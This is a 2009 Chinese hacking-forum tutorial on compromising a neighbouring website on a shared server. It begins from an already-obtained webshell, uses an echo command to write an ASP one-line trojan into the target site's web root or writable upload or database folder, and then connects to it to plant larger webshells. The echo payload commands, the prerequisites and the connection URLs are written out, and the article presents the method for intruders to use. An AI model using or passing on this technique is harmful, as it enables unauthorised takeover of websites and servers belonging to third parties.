热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全

echo旁注拿下相邻网站webshell分析

发布时间:2009-10-23 10:24文章来源:未知文章作者:黑白前线 点击次数:
摘要:旁注,对于入侵者应该并不莫生了。当一个网站找了很久没发现漏洞时,就会想办法从相邻的网站下手了。一般用到的手段是入侵提权最终拿下服务器的权限,但还有一种方法无需提权。执行echo命令导出一句话木马拿下网站webshell。...

信息发布:黑白前线

文章作者:udb311

转载请注明:信息来源黑白前线www.hackline.net

 


说到echo对于应用批处理的朋友都会用到这个东东了。但是echo如何能够取下相邻webshell呢?
这要有条件的:
1、必须先拿下同一服务器的一个webshell权限
2、必须得到目标网站的绝对路径
3、webshell要有执行命令的权限
4、对于网站访问、写入必须是同一用户权限

echo格式
echo ^<^%exectue request("a")^%^> >d:\web\test.asp

对于一个网站,直接不能拿下那只能选择旁注了。首先我们使用ip866对目标域名进行反向查询,对于较弱的程序进行入侵拿下网站的webshll。
接下来就是提权或者跨目录写入了。
首先查看是否有运行执行权限

echo旁注

跳转到文档目录,上传cmd。

echo旁注

C:\Documents and Settings\All Users\Documents\


WEB目录执行导出一句话:e:\web\wwwroot
echo ^<^%exectue request("a")^%^> >e:\web\wwwroot\server.asp

echo旁注

这样就直接写入到根目录,如果没给权限写入。可以找到网站的上传目录和数据库目录upfile或者database一般都会给写入权限的。

执行成功,我们来看下有没有生成一句话木马。


实验得出echo必须满以上四点条件。

接下来就是使用asp一句话连接端进行连接上传小马或者大马。了

连接地址:http://www.xxx.com/server.asp或者http://www.xxx.com/database/server.asp

 

标签分类: 入侵检测

上一篇:asp中调用fso设置文件属性
下一篇:入侵aspx网站的一些技巧